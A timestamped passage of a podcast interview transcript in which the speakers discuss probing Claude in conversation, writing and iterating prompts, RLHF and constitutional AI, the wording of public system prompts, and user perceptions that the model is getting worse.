02:59:52.460 | mocking them, without so on, but it's just like, okay, what would the world look like?
02:59:57.020 | What would the physics of the world with the flat earth look like?
02:59:59.740 | There's a few cool videos on this.
03:00:01.260 | - Yeah.
03:00:01.740 | - And then like, is it possible the physics is different?
03:00:05.340 | And what kind of experience would we do?
03:00:06.700 | And just, yeah, without disrespect, without dismissiveness, have that conversation.
03:00:11.180 | Anyway, that to me is a useful thought experiment of like,
03:00:14.460 | how does Claude talk to a flat earth believer and still teach them something,
03:00:21.660 | still grow, help them grow, that kind of stuff.
03:00:24.860 | - Yeah.
03:00:25.100 | - That's challenging.
03:00:26.380 | - And kind of like walking that line between convincing someone and just trying to talk
03:00:32.060 | at them versus drawing out their views, listening and then offering kind of counter considerations.
03:00:38.460 | And it's hard.
03:00:41.020 | I think it's actually a hard line where it's like, where are you trying to convince someone
03:00:44.780 | versus just offering them considerations and things for them to think about
03:00:49.660 | so that you're not actually influencing them, you're just letting them reach wherever they reach.
03:00:54.540 | And that's a line that is difficult, but that's the kind of thing that
03:00:58.060 | language models have to try and do.
03:00:59.340 | - So, like I said, you've had a lot of conversations with Claude.
03:01:03.500 | Can you just map out what those conversations are like?
03:01:06.540 | What are some memorable conversations?
03:01:08.140 | What's the purpose, the goal of those conversations?
03:01:11.340 | - Yeah, I think that most of the time when I'm talking with Claude,
03:01:16.540 | I'm trying to kind of map out its behavior in part.
03:01:21.260 | Obviously I'm getting helpful outputs from the model as well.
03:01:24.860 | But in some ways, this is like how you get to know a system, I think, is by probing it
03:01:29.340 | and then augmenting the message that you're sending and then checking the response to that.
03:01:35.020 | So in some ways, it's like how I map out the model.
03:01:37.980 | I think that people focus a lot on these quantitative evaluations of models.
03:01:44.940 | And this is a thing that I've said before, but I think in the case of language models,
03:01:51.500 | a lot of the time each interaction you have is actually quite high information.
03:01:57.340 | It's very predictive of other interactions that you'll have with the model.
03:02:01.260 | And so I guess I'm like, if you talk with a model hundreds or thousands of times,
03:02:06.300 | this is almost like a huge number of really high quality data points about what the model is like.
03:02:12.140 | In a way that lots of very similar but lower quality conversations just aren't,
03:02:18.460 | or questions that are just mildly augmented and you have thousands of them,
03:02:21.900 | might be less relevant than a hundred really well-selected questions.
03:02:24.940 | Let's see, you're talking to somebody who as a hobby does a podcast.
03:02:29.580 | I agree with you a hundred percent.
03:02:31.020 | If you're able to ask the right questions and are able to hear,
03:02:39.260 | understand the depth and the flaws in the answer, you can get a lot of data from that.
03:02:47.020 | Yeah.
03:02:47.260 | So your task is basically how to probe with questions.
03:02:52.460 | Yeah.
03:02:52.860 | And you're exploring the long tail, the edges, the edge cases,
03:02:56.860 | or are you looking for general behavior?
03:03:00.620 | I think it's almost everything.
03:03:03.820 | Because I want a full map of the model, I'm kind of trying to do
03:03:08.220 | the whole spectrum of possible interactions you could have with it.
03:03:13.420 | So one thing that's interesting about Claude,
03:03:16.060 | and this might actually get to some interesting issues with RLHF,
03:03:19.180 | which is if you ask Claude for a poem, I think that a lot of models, if you ask them for a poem,
03:03:24.380 | the poem is fine. Usually it kind of rhymes. If you say, "Give me a poem about the Sun,"
03:03:30.780 | it'll be a certain length, it'll rhyme, it'll be fairly benign.
03:03:38.060 | And I've wondered before, is it the case that what you're seeing is kind of like the average?
03:03:43.340 | It turns out, if you think about people who have to talk to a lot of people and be very charismatic,
03:03:47.660 | one of the weird things is that I'm like, "Well, they're kind of incentivized to have
03:03:51.180 | these extremely boring views." Because if you have really interesting views, you're divisive.
03:03:56.220 | And a lot of people are not going to like you. So if you have very extreme policy positions,
03:04:02.300 | I think you're just going to be less popular as a politician, for example.
03:04:06.620 | And it might be similar with creative work. If you produce creative work that is just trying
03:04:11.980 | to maximize the number of people that like it, you're probably not going to get as many people
03:04:15.980 | who just absolutely love it, because it's going to be a little bit, you know, you're like, "Oh,
03:04:20.940 | this is the out. Yes, this is decent." And so you can do this thing where I have various prompting
03:04:27.500 | things that I'll do to get Claude to… I'll do a lot of like, "This is your chance to be fully
03:04:33.900 | creative. I want you to just think about this for a long time. And I want you to create a poem about
03:04:39.660 | this topic that is really expressive of you, both in terms of how you think poetry should be
03:04:44.620 | structured, etc." And you just give it this really long prompt. And his poems are just so much
03:04:50.700 | better. They're really good. And I don't think I'm someone who is… I think it got me interested in
03:04:56.860 | poetry, which I think was interesting. I would read these poems and just be like, "I love the
03:05:02.460 | imagery. I love like…" And it's not trivial to get the models to produce work like that. But when
03:05:08.300 | they do, it's really good. So I think that's interesting that just encouraging creativity
03:05:14.060 | and for them to move away from the kind of standard, immediate reaction that might just be
03:05:20.220 | the aggregate of what most people think is fine can actually produce things that, at least to my
03:05:24.700 | mind, are probably a little bit more divisive, but I like them. But I guess a poem is a nice, clean,
03:05:32.060 | um, way to observe creativity. It's just like easy to detect vanilla versus non-vanilla.
03:05:38.780 | Yeah. That's interesting. That's really interesting. So on that topic,
03:05:43.340 | so the way to produce creativity or something special, you mentioned writing prompts. And
03:05:48.220 | I've heard you talk about, I mean, the science and the art of prompt engineering. Could you just
03:05:55.020 | speak to, uh, what it takes to write great prompts?
03:05:59.980 | I really do think that philosophy has been weirdly helpful for me here more than in many other
03:06:07.820 | respects. So in philosophy, what you're trying to do is convey these very hard concepts. One of the
03:06:15.900 | things you are taught is like, and I think it is because it is, I think it is an anti-bullshit
03:06:21.820 | device in philosophy. Philosophy is an area where you could have people bullshitting and
03:06:26.060 | you don't want that. Um, and so it's like this like desire for like extreme clarity. So it's like
03:06:33.580 | anyone could just pick up your paper, read it and know exactly what you're talking about is why it
03:06:37.580 | can almost be kind of dry. Like all of the terms are defined. Every objection is kind of gone
03:06:42.540 | through methodically. Um, and it makes sense to me because I'm like, when you're in such an
03:06:46.700 | a priori domain, like you just, clarity is sort of a, uh, this way that you can, you know, um,
03:06:54.620 | prevent people from just kind of making stuff up. And I think that's sort of what you have to do
03:07:00.460 | with language models. Like very often I actually find myself doing sort of mini versions of
03:07:04.620 | philosophy, you know? So I'm like, suppose that you give me a task, I have a task for the model
03:07:09.740 | and I want it to like pick out a certain kind of question or identify whether an answer has a
03:07:13.660 | certain property. Like I'll actually sit and be like, let's just give this a name, this property.
03:07:19.340 | So like, you know, suppose I'm trying to tell it like, oh, I want you to identify whether this
03:07:23.500 | response was rude or polite. I'm like, that's a whole philosophical question in and of itself.
03:07:28.140 | So I have to do as much like philosophy as I can in the moment to be like, here's what I mean by
03:07:31.820 | rudeness and here's what I mean by politeness. And then there's a like, there's another element
03:07:36.620 | that's a bit more, um, I guess, I don't know if this is scientific or empirical. I think it's
03:07:43.660 | empirical. So like I take that description and then what I want to do is, is again, probe the
03:07:49.100 | model like many times. Like this is very, prompting is very iterative. Like I think a lot of people
03:07:53.500 | where they're, if a prompt is important, they'll iterate on it hundreds or thousands of times.
03:07:57.180 | And so you give it the instructions and then I'm like, what are the edge cases? So if I looked at
03:08:03.180 | this, so I try and like almost like, you know, see myself from the position of the model and be like,
03:08:09.180 | what is the exact case that I would misunderstand or where I would just be like, I don't know what
03:08:13.180 | to do in this case. And then I give that case to the model and I see how it responds. And if I
03:08:17.500 | think I got it wrong, I add more instructions or even add that in as an example. So these very,
03:08:22.620 | like taking the examples that are right at the edge of what you want and don't want and putting
03:08:26.940 | those into your prompt as like an additional kind of way of describing the thing. Um, and so yeah,
03:08:32.060 | in many ways it just feels like this mix of like, it's really just trying to do clear exposition.
03:08:37.740 | Um, and I think I do that cause that's how I get clear on things myself. So in many ways, like
03:08:43.340 | clear prompting for me is often just me understanding what I want. Um, it's like half
03:08:47.820 | the task. So I guess that's quite challenging. There's like a laziness that overtakes me if I'm
03:08:53.260 | talking to Claude where I hope Claude just figures it out. So for example, I asked Claude for today
03:08:59.980 | to ask some interesting questions. Okay. And the questions that came up, and I think I listed a few
03:09:05.980 | sort of, um, interesting counterintuitive and or funny or something like this. All right. And it
03:09:11.980 | gave me some pretty good, like it was okay. But I think what I'm hearing you say is like, all right,
03:09:17.900 | well, I have to be more rigorous here. I should probably give examples of what I mean by interesting
03:09:22.700 | and what I mean by funny or counterintuitive and iteratively, um, build that prompt to do better
03:09:33.180 | to get it like what feels like is the right. Cause it's really, it's a creative act. I'm not asking
03:09:39.420 | for factual information, I'm asking to together right with Claude. So I almost have to program
03:09:45.020 | using natural language. Yeah. I think that prompting does feel a lot like the kind of
03:09:50.380 | the programming using natural language and experimentation or something. It's an odd blend
03:09:55.420 | of the two. I do think that for most tasks. So if I just want Claude to do a thing, I think that
03:10:00.380 | I am probably more used to knowing how to ask it to avoid like common pitfalls or issues that
03:10:05.580 | it has. I think these are decreasing a lot over time. Um, but it's also very fine to just ask it
03:10:11.980 | for the thing that you want. Um, I think that prompting actually only really becomes relevant
03:10:16.140 | when you're really trying to eke out the top, like 2% of model performance. So for like a lot
03:10:20.620 | of tasks, I might just, you know, if it gives me an initial list back and there's something I don't
03:10:24.220 | like about it, like it's kind of generic, like for that kind of task, I'd probably just take
03:10:28.700 | a bunch of questions that I've had in the past that I've thought worked really well. And I would
03:10:32.940 | just give it to the model and then be like, no, here's this person that I'm talking with.
03:10:36.060 | Give me questions of at least that quality. Um, or I might just ask it for some questions. And then
03:10:43.340 | if I was like, Oh, these are kind of try or like, you know, I would just give it that feedback and
03:10:47.420 | then hopefully produces a better list. Um, I think that kind of iterative prompting at that point,
03:10:53.100 | your prompt is like a tool that you're going to get so much value out of that you're willing to
03:10:56.460 | put in the work. Like if I was a company making prompts for models, I'm just like, if you're
03:11:01.020 | willing to spend a lot of like time and resources on the engineering behind like what you're building,
03:11:05.820 | then the prompt is not something that you should be spending like an hour on. It's like, that's a
03:11:10.540 | big part of your system. Make sure it's working really well. And so it's only things like that.
03:11:14.620 | Like if I, if I'm using a prompt to like classify things or to create data, that's when you're like,
03:11:19.340 | it's actually worth just spending like a lot of time, like really thinking it through.
03:11:22.620 | What other advice would you give to people that are talking to Claude sort of generally more
03:11:29.020 | general? Cause right now we're talking about maybe the edge cases, like eking out the 2%,
03:11:32.140 | but what in general advice would you give when they show up to Claude trying it for the first
03:11:38.060 | time? You know, there's a concern that people over-anthropomorphize models. And I think that's
03:11:41.740 | like a very valid concern. I also think that people often under-anthropomorphize them because
03:11:46.940 | sometimes when I see like issues that people have run into with Claude, you know, say Claude is
03:11:51.100 | like refusing a task that it shouldn't refuse. But then I look at the text and like the specific
03:11:56.460 | wording of what they wrote. And I'm like, I see why Claude did that. And I'm like, if you think
03:12:03.820 | through how that looks to Claude, you probably could have just written it in a way that wouldn't
03:12:07.580 | evoke such a response. Especially this is more relevant if you see failures or if you see issues,
03:12:13.340 | it's sort of like, think about what the model failed at, like why, what did it do wrong?
03:12:18.060 | And then maybe that will give you a sense of like why. So is it the way that I phrased the thing?
03:12:24.860 | And obviously like as models get smarter, you're going to need less of this. And I already see
03:12:29.820 | like people needing less of it. But that's probably the advice is sort of like try to
03:12:34.460 | have sort of empathy for the model. Like read what you wrote as if you were like a kind of like
03:12:39.260 | person just encountering this for the first time. How does it look to you? And what would have made
03:12:43.660 | you behave in the way that the model behaved? So if it misunderstood what kind of like,
03:12:47.340 | what coding language you wanted to use, is that because like it was just very ambiguous and it
03:12:51.260 | kind of had to take a guess, in which case next time you could just be like, hey, make sure this
03:12:55.020 | is in Python or, I mean, that's the kind of mistake I think models are much less likely to
03:12:58.620 | make now. But if you do see that kind of mistake, that's probably the advice I'd have.
03:13:03.660 | And maybe sort of, I guess, ask questions why or what other details can I provide to help you
03:13:11.420 | answer better? Does that work or no? Yeah. I mean, I've done this with the models,
03:13:15.820 | like it doesn't always work, but like sometimes I'll just be like, why did you do that?
03:13:20.620 | I mean, people underestimate the degree to which you can really interact with models.
03:13:25.420 | Like, yeah, I'm just like, and sometimes I'll just like quote word for word the part that made you,
03:13:31.580 | and you don't know that it's like fully accurate, but sometimes you do that and then you change a
03:13:35.260 | thing. I mean, I also use the models to help me with all of this stuff. I should say like
03:13:38.780 | prompting can end up being a little factory where you're actually building prompts to generate
03:13:43.180 | prompts. And so like, yeah, anything where you're like having an issue, asking for suggestions,
03:13:50.620 | sometimes just do that. Like you made that error. What could I have said? That's actually not
03:13:54.780 | uncommon for me to do. What could I have said that would make you not make that error? Write
03:13:58.620 | that out as an instruction. And I'm going to give it to model. I'm going to try it. Sometimes I do
03:14:02.780 | that. I give that to the model in another context window often. I take the response, I give it to
03:14:08.380 | Claude and I'm like, hmm, didn't work. Can you think of anything else? You can play around with
03:14:13.340 | these things quite a lot. - To jump into technical for a little bit. So the magic of post-training.
03:14:20.460 | Why do you think RLHF works so well to make the model seem smarter, to make it more interesting
03:14:30.540 | and useful to talk to and so on? - I think there's just a huge amount of
03:14:36.700 | information in the data that humans provide when we provide preferences,
03:14:42.300 | especially because different people are going to pick up on really subtle and small things.
03:14:48.300 | So I've thought about this before where you probably have some people who just really
03:14:51.740 | care about good grammar use for models, like was a semicolon used correctly or something.
03:14:56.620 | And so you'll probably end up with a bunch of data in there that you as a human, if you're
03:15:01.660 | looking at that data, you wouldn't even see that. You'd be like, why did they prefer this response
03:15:05.900 | to that one? I don't get it. And then the reason is you don't care about semicolon usage, but that
03:15:09.900 | person does. And so each of these single data points has, and this model just has so many of
03:15:18.220 | those, it has to try and figure out what is it that humans want in this really complex, across
03:15:24.220 | all domains. They're going to be seeing this across many contexts. It feels like the classic
03:15:29.980 | issue of deep learning where historically we've tried to do edge detection by mapping things out.
03:15:36.460 | And it turns out that actually if you just have a huge amount of data that actually accurately
03:15:42.060 | represents the picture of the thing that you're trying to train the model to learn, that's more
03:15:46.860 | powerful than anything else. And so I think one reason is just that you are training the model on
03:15:54.140 | exactly the task and with a lot of data that represents many different angles on which people
03:16:01.660 | prefer and disprefer responses. I think there is a question of, are you eliciting things from
03:16:07.740 | pre-trained models or are you teaching new things to models? In principle, you can teach new things
03:16:16.060 | to models in post-training. I do think a lot of it is eliciting powerful pre-trained models.
03:16:23.340 | So people are probably divided on this because obviously in principle you can
03:16:26.300 | definitely teach new things. I think for the most part, for a lot of the capabilities that we
03:16:32.940 | most use and care about, a lot of that feels like it's there in the pre-trained models and
03:16:41.180 | reinforcement learning is eliciting it and getting the models to bring it out.
03:16:46.140 | So the other side of post-training, this really cool idea of constitutional AI.
03:16:51.180 | You're one of the people that are critical to creating that idea.
03:16:55.900 | Yeah, I worked on it.
03:16:56.860 | Can you explain this idea from your perspective? How does it integrate into
03:17:00.460 | making Claude what it is? By the way, do you gender Claude or no?
03:17:05.900 | It's weird because I think that a lot of people prefer he for Claude. I actually kind of like
03:17:12.140 | that. I think Claude is usually slightly male-leaning, but it can be male or female,
03:17:18.060 | which is quite nice. I still use 'it' and I have mixed feelings about this. I now just
03:17:26.300 | think of the 'it' pronoun for Claude as, I don't know, it's just the one I associate with Claude.
03:17:33.100 | I can imagine people moving to 'he' or 'she'.
03:17:37.020 | It feels somehow disrespectful. I'm denying
03:17:43.580 | the intelligence of this entity by calling it 'it'. I remember always, "Don't gender the robots."
03:17:49.900 | But I don't know. I anthropomorphize pretty quickly and construct it like a backstory
03:17:58.380 | in my head.
03:17:59.020 | I've wondered if I anthropomorphize things too much because I have this with my car,
03:18:05.260 | especially my car and bikes. I don't give them names because then I used to name my bikes,
03:18:12.700 | and then I had a bike that got stolen and I cried for like a week. I was like,
03:18:15.500 | "If I'd never given it a name, I wouldn't have been so upset. I felt like I'd let it down."
03:18:19.420 | I've wondered as well, it might depend on how much 'it' feels like a kind of objectifying
03:18:27.420 | pronoun. If you just think of 'it' as a pronoun that objects often have, and maybe AIs can have
03:18:35.580 | that pronoun. That doesn't mean that if I call Claude 'it', that I think of it as less intelligent
03:18:43.260 | or like I'm being disrespectful. I'm just like, "You are a different kind of entity, and so
03:18:47.100 | I'm going to give you the respectful 'it'."
03:18:51.260 | Yeah, anyway, the divergence was beautiful. The constitutional AI idea, how does it work?
03:18:58.620 | So there's a couple of components of it. The main component I think people find interesting
03:19:03.500 | is the kind of reinforcement learning from AI feedback. You take a model that's already trained,
03:19:09.100 | and you show it two responses to a query, and you have a principle. We've tried this with
03:19:15.900 | harmlessness a lot. Suppose that the query is about weapons, and your principle is like,
03:19:23.820 | "Select the response that is less likely to encourage people to purchase illegal weapons."
03:19:32.780 | That's probably a fairly specific principle, but you can give any number.
03:19:36.220 | The model will give you a kind of ranking, and you can use this as preference data in the same
03:19:43.820 | way that you use human preference data, and train the models to have these relevant traits
03:19:49.500 | from their feedback alone instead of from human feedback. So if you imagine that,
03:19:55.180 | like I said earlier, with the human who just prefers the kind of semi-colon usage in this
03:19:58.780 | particular case, you're kind of taking lots of things that could make a response preferable,
03:20:03.580 | and getting models to do the labeling for you basically.
03:20:08.060 | There's a nice trade-off between helpfulness and harmlessness. When you integrate something
03:20:15.740 | like constitutional AI, you can make them up without sacrificing much helpfulness,
03:20:21.900 | make it more harmless.
03:20:23.660 | Yeah. In principle, you could use this for anything. Harmlessness is a task that might
03:20:30.460 | just be easier to spot. When models are less capable, you can use them to rank things
03:20:38.140 | according to principles that are fairly simple, and they'll probably get it right. I think one
03:20:42.620 | question is just, "Is it the case that the data that they're adding is fairly reliable?"
03:20:49.100 | But if you had models that were extremely good at telling whether one response was more
03:20:56.140 | historically accurate than another, in principle, you could also get AI feedback on that task as
03:21:00.940 | well. There's a kind of nice interpretability component to it, because you can see the
03:21:05.660 | principles that went into the model when it was being trained. Also, it gives you a degree of
03:21:13.980 | control. If you were seeing issues in a model, like it wasn't having enough of a certain trait,
03:21:18.620 | then you can add data relatively quickly that should just train the model to have that trait.
03:21:25.820 | It creates its own data for training, which is quite nice.
03:21:29.180 | It's really nice, because it creates this human interpretable document that I can imagine in the
03:21:33.980 | future there's just gigantic fights in politics over every single principle and so on. At least
03:21:40.620 | it's made explicit, and you can have a discussion about the phrasing. Maybe the actual behavior of
03:21:47.420 | the model is not so cleanly mapped to those principles. It's not adhering strictly to them,
03:21:53.340 | it's just a nudge. I've actually worried about this,
03:21:56.860 | because the character training is a variant of the constitutional AI approach. I've worried that
03:22:04.140 | people think that the constitution is just the whole thing again. It would be really nice if what
03:22:12.300 | I was just doing was telling the model exactly what to do and just exactly how to behave,
03:22:16.300 | but it's definitely not doing that, especially because it's interacting with human data.
03:22:19.980 | For example, if you see a certain leaning in the model, if it comes out with a political
03:22:25.660 | leaning from training from the human preference data, you can nudge against that. You could be
03:22:33.020 | like, "Oh, consider these values." Because let's say it's just never inclined to – I don't know,
03:22:37.340 | maybe it never considers privacy as – I mean, this is implausible, but anything where there's
03:22:45.020 | already a pre-existing bias towards a certain behavior, you can nudge away. This can change
03:22:50.540 | both the principles that you put in and the strength of them. You might have a principle
03:22:54.860 | that's like – imagine that the model was always extremely dismissive of, I don't know, some
03:23:01.100 | political or religious view for whatever reason. You're like, "Oh no, this is terrible." If that
03:23:07.420 | happens, you might put like, "Never ever, ever prefer a criticism of this religious or political
03:23:15.100 | view." Then people would look at that and be like, "Never ever?" Then you're like, "No."
03:23:18.700 | If it comes out with a disposition, saying "never ever" might just mean instead of getting 40%,
03:23:24.700 | which is what you would get if you just said, "Don't do this," you get 80%, which is what you
03:23:29.660 | actually wanted. It's that thing of both the nature of the actual principles you add and how
03:23:34.460 | you phrase them. I think if people would look, they're like, "Oh, this is exactly what you want
03:23:37.660 | from the model." I'm like, "No, that's how we nudged the model to have a better shape," which
03:23:44.860 | doesn't mean that we actually agree with that wording, if that makes sense.
03:23:47.820 | There's system prompts that are made public. You tweeted one of the earlier ones for CLAWT3,
03:23:54.620 | I think. They're made public since then. It's interesting to read to them. I can feel the
03:24:00.300 | thought that went into each one. I also wonder how much impact each one has. Some of them,
03:24:07.180 | you can tell CLAWT was really not behaving well. You have to have a system prompt to like, "Hey,"
03:24:14.220 | trivial stuff, I guess, basic informational things. On the topic of controversial topics that
03:24:20.460 | you've mentioned, one interesting one I thought is, if it is asked to assist with tasks involving
03:24:26.460 | the expression of views held by a significant number of people, CLAWT provides assistance
03:24:30.620 | with the task regardless of its own views. If asked about controversial topics, it tries to
03:24:35.580 | provide careful thoughts and clear information. CLAWT presents the requested information without
03:24:42.300 | explicitly saying that the topic is sensitive and without claiming to be presenting the objective
03:24:48.940 | facts. It's less about objective facts, according to CLAWT, and it's more about, "Are a large number
03:24:56.140 | of people believing this thing?" That's interesting. I'm sure a lot of thought went into that.
03:25:02.860 | Can you just speak to it? How do you address things that are a tension with "CLAWT's views?"
03:25:10.700 | I think there's sometimes an asymmetry. I think I noted this in, I can't remember if it was that
03:25:16.140 | part of the system prompt or another, but the model was slightly more inclined to refuse tasks
03:25:22.060 | if it was about either say… So maybe it would refuse things with respect to a right-wing
03:25:28.140 | politician, but with an equivalent left-wing politician, it wouldn't, and we wanted more
03:25:33.420 | symmetry there. I think it was the thing of if a lot of people have a certain political view
03:25:44.780 | and want to explore it, you don't want CLAWT to be like, "Well, my opinion is different and so I'm
03:25:49.740 | going to treat that as harmful." I think it was partly to nudge the model to just be like, "Hey,
03:25:56.380 | if a lot of people believe this thing, you should just be engaging with the task and willing to do
03:26:01.420 | it." Each of those parts of that is actually doing a different thing, because it's funny when you
03:26:06.860 | write out the without claiming to be objective, because what you want to do is push the model
03:26:11.580 | so it's more open, it's a little bit more neutral, but then what it would love to do is be like,
03:26:16.380 | "As an objective…" We were just talking about how objective it was, and I was like, "Claude,
03:26:21.020 | you're still biased and have issues, and so stop claiming that everything… The solution to
03:26:27.420 | potential bias from you is not to just say that what you think is objective."
03:26:30.940 | So that was with initial versions of that part of the system prompt when I was iterating on it.
03:26:37.020 | It was like…
03:26:37.420 | So a lot of parts of these sentences…
03:26:39.500 | Yeah, are doing work.
03:26:40.540 | Are doing some work.
03:26:42.060 | Yeah.
03:26:42.700 | That's what it felt like. That's fascinating. Can you explain maybe some ways in which the prompts
03:26:48.540 | evolved over the past few months, because there's different versions? I saw that the filler phrase
03:26:53.500 | request was removed. The filler, it reads, "Claude responds directly to all human messages without
03:26:59.580 | unnecessary affirmations." The filler phrase is like, "Certainly. Of course. Absolutely. Great.
03:27:04.700 | Sure." Specifically, "Claude avoids starting responses with the word 'certainly' in any way."
03:27:09.900 | That seems like good guidance, but why was it removed?
03:27:13.980 | Yeah, so it's funny because this is one of the downsides of making system prompts public. I don't
03:27:20.380 | think about this too much if I'm trying to help iterate on system prompts. Again, I think about
03:27:26.380 | how it's going to affect the behavior, but then I'm like, "Oh, wow." Sometimes I put "never" in
03:27:30.300 | all caps when I'm writing system prompt things, and I'm like, "I guess that goes out to the world."
03:27:35.100 | Yeah, so the model was doing this. It loved it. During training, it picked up on this thing,
03:27:40.460 | which was to basically start everything with a kind of "certainly", and then when we removed,
03:27:46.860 | you can see why I added all of the words, because what I'm trying to do is, in some ways,
03:27:50.860 | trap the model out of this. It would just replace it with another affirmation.
03:27:54.940 | So it can help. If it gets caught in phrases, actually just adding the explicit phrase and
03:28:00.140 | saying, "Never do that," then it sort of knocks it out of the behavior a little bit more, because
03:28:05.740 | it does just, for whatever reason, help. Then basically, that was just an artifact of training
03:28:12.300 | that we then picked up on and improved things so that it didn't happen anymore. Once that happens,
03:28:17.820 | you can just remove that part of the system prompt. I think that's just something where
03:28:21.020 | Claude does affirmations a bit less, and so it wasn't doing as much.
03:28:28.700 | I see. So the system prompt works hand-in-hand with the post-training,
03:28:33.820 | and maybe even the pre-training, to adjust the final overall system.
03:28:38.860 | I mean, any system prompt that you make, you could distill that behavior back into a model,
03:28:43.100 | because you really have all of the tools there for making data that you could train the models to
03:28:48.300 | just have that treat a little bit more. Then sometimes you'll just find issues in training.
03:28:55.500 | The way I think of it is the benefit of it is that it has a lot of similar components to some
03:29:02.860 | aspects of post-training. It's a nudge. Do I mind if Claude sometimes says, "Sure"? No, that's fine,
03:29:11.020 | but the wording of it is very, "Never, ever, ever do this," so that when it does slip up,
03:29:16.860 | it's hopefully a couple of percent of the time and not 20 or 30 percent of the time.
03:29:21.980 | But I think of it as if you're still seeing issues. Each thing is costly to a different
03:29:33.420 | degree, and the system prompt is cheap to iterate on. If you're seeing issues in the fine-tuned
03:29:39.260 | model, you can just potentially patch them with a system prompt. I think of it as patching issues
03:29:44.460 | and slightly adjusting behaviors to make it better and more to people's preferences.
03:29:48.460 | It's almost like the less robust but faster way of just solving problems.
03:29:54.300 | Let me ask about the feeling of intelligence. Dario said that anyone model of Claude is not
03:30:01.740 | getting dumber, but there is a popular thing online where people have this feeling like Claude
03:30:08.540 | might be getting dumber. From my perspective, it's most likely a fascinating, I'd love to
03:30:14.300 | understand it more, psychological, sociological effect. But you, as a person who talks to Claude
03:30:21.180 | a lot, can you empathize with the feeling that Claude is getting dumber?
03:30:24.540 | Yeah, no. I think that that is actually really interesting, because I remember seeing this happen
03:30:28.380 | when people were flagging this on the internet. It was really interesting, because I knew that,
03:30:33.180 | at least in the cases I was looking at, it was like, "Nothing has changed." Literally,
03:30:37.740 | it cannot. It is the same model with the same system prompt, same everything.
03:30:43.420 | I think when there are changes, then it makes more sense. One example is you can have artifacts
03:30:55.340 | turned on or off on Claude.ai. Because this is a system prompt change, I think it does mean that
03:31:04.620 | the behavior changes a little bit. I did flag this to people, where I was like, "If you love
03:31:09.100 | Claude's behavior," and then artifacts was turned from the thing you had to turn on to the default,
03:31:15.100 | just try turning it off and see if the issue you were facing was that change.
03:31:19.020 | But it was fascinating, because yeah, you sometimes see people
03:31:22.700 | indicate that there's a regression when I'm like, "There cannot." Again, you should never be
03:31:30.940 | dismissive, and so you should always investigate. Maybe something is wrong that you're not seeing,
03:31:34.300 | maybe there was some change made, but then you look into it and you're like, "This is just the
03:31:38.300 | same model doing the same thing." I'm like, "I think it's just that you got unlucky with a few
03:31:42.460 | prompts or something, and it looked like it was getting much worse. Actually, it was maybe just
03:31:47.980 | like luck." I also think there is a real psychological effect where the baseline increases,
03:31:53.420 | you start getting used to a good thing. All the times that Claude says something really smart,
03:31:58.540 | your sense of it's intelligent grows in your mind, I think. Then if you return back and you
03:32:04.620 | prompt in a similar way, not the same way, in a similar way, the concept it was okay with before,
03:32:09.420 | and it says something dumb, that negative experience really stands out. I think one of,
03:32:15.500 | I guess, the things to remember here is that just the details of a prompt can have a lot of impact.
03:32:22.860 | There's a lot of variability in the result. - You can get randomness, is the other thing,
03:32:29.020 | and just trying the prompt four or 10 times, you might realize that actually,
03:32:34.700 | possibly, two months ago, you tried it and it succeeded, but actually, if you'd tried it,
03:32:41.180 | it would have only succeeded half of the time, and now it only succeeds half of the time,
03:32:44.940 | and that can also be an effect. - Do you feel pressure having to write
03:32:48.380 | the system prompt that a huge number of people are gonna use?
03:32:51.580 | - This feels like an interesting psychological question. I feel like a lot of responsibility
03:32:58.220 | or something, I think that's, and you can't get these things perfect, so you're like,
03:33:03.500 | it's going to be imperfect, you're gonna have to iterate on it. I would say more responsibility
03:33:13.420 | than anything else, though I think working in AI has taught me that I thrive a lot more under
03:33:21.580 | feelings of pressure and responsibility than, I'm like, it's almost surprising that I went
03:33:27.020 | into academia for so long, 'cause I'm like, I just feel like it's the opposite. Things move fast,
03:33:33.260 | and you have a lot of responsibility, and I quite enjoy it for some reason.
03:33:36.780 | - I mean, it really is a huge amount of impact if you think about constitutional AI and writing a
03:33:42.220 | system prompt for something that's tending towards superintelligence, and potentially is extremely
03:33:49.260 | useful to a very large number of people. - Yeah, I think that's the thing. It's
03:33:52.780 | something like, if you do it well, you're never going to get it perfect, but I think the thing
03:33:57.340 | that I really like is the idea that when I'm trying to work on the system prompt, I'm bashing
03:34:02.780 | on thousands of prompts, and I'm trying to imagine what people are going to want to use Cloud for,
03:34:07.180 | and I guess the whole thing that I'm trying to do is improve their experience of it.
03:34:12.140 | So maybe that's what feels good. I'm like, if it's not perfect, I'll improve it, we'll fix issues,
03:34:18.140 | but sometimes the thing that can happen is that you'll get feedback from people that's really
03:34:22.540 | positive about the model, and you'll see that something you did... When I look at models now,
03:34:28.940 | I can often see exactly where a trait or an issue is coming from, and so when you see something that
03:34:34.060 | you did, or you were influential in, making that difference or making someone have a nice
03:34:40.860 | interaction, it's quite meaningful. But yeah, as the systems get more capable, this stuff gets more
03:34:46.380 | stressful, because right now, they're not smart enough to pose any issues, but I think over time,
03:34:53.260 | it's going to feel like possibly bad stress over time. - How do you get signal feedback about the
03:35:01.180 | human experience across thousands, tens of thousands, hundreds of thousands of people,
03:35:05.340 | like what their pain points are, what feels good? Are you just using your own intuition as you talk
03:35:10.620 | to it to see what are the pain points? - I think I use that partly, and then obviously we have...
03:35:17.180 | So people can send us feedback, both positive and negative, about things that the model has done,
03:35:22.700 | and then we can get a sense of areas where it's falling short. Internally, people work with the
03:35:30.060 | models a lot and try to figure out areas where there are gaps, and so I think it's this mix of
03:35:35.420 | interacting with it myself, seeing people internally interact with it, and then explicit
03:35:41.020 | feedback we get. And then I find it hard to not also... If people are on the internet, and they
03:35:48.860 | say something about Claude, and I see it, I'll also take that seriously. - I don't know, see,
03:35:53.900 | I'm torn about that. I'm going to ask you a question from Reddit. When will Claude stop
03:35:57.900 | trying to be my puritanical grandmother, imposing its moral worldview on me as a paying customer?
03:36:04.220 | And also, what is the psychology behind making Claude overly apologetic?
03:36:08.940 | - Yeah. - So how would you address
03:36:12.380 | this very non-representative Reddit question? - I'm pretty sympathetic in that they are in
03:36:19.820 | this difficult position, where I think that they have to judge whether something's actually, say,
03:36:24.140 | risky or bad, and potentially harmful to you or anything like that. So they're having to draw this
03:36:30.860 | line somewhere, and if they draw it too much in the direction of, "I'm imposing my ethical worldview
03:36:38.060 | on you, that seems bad." So in many ways, I like to think that we have actually seen improvements
03:36:44.300 | across the board, which is kind of interesting, because that kind of coincides with, for example,
03:36:52.620 | adding more of character training. And I think my hypothesis was always, the good character isn't,
03:36:59.580 | again, one that's just moralistic. It's one that respects you and your autonomy and your ability
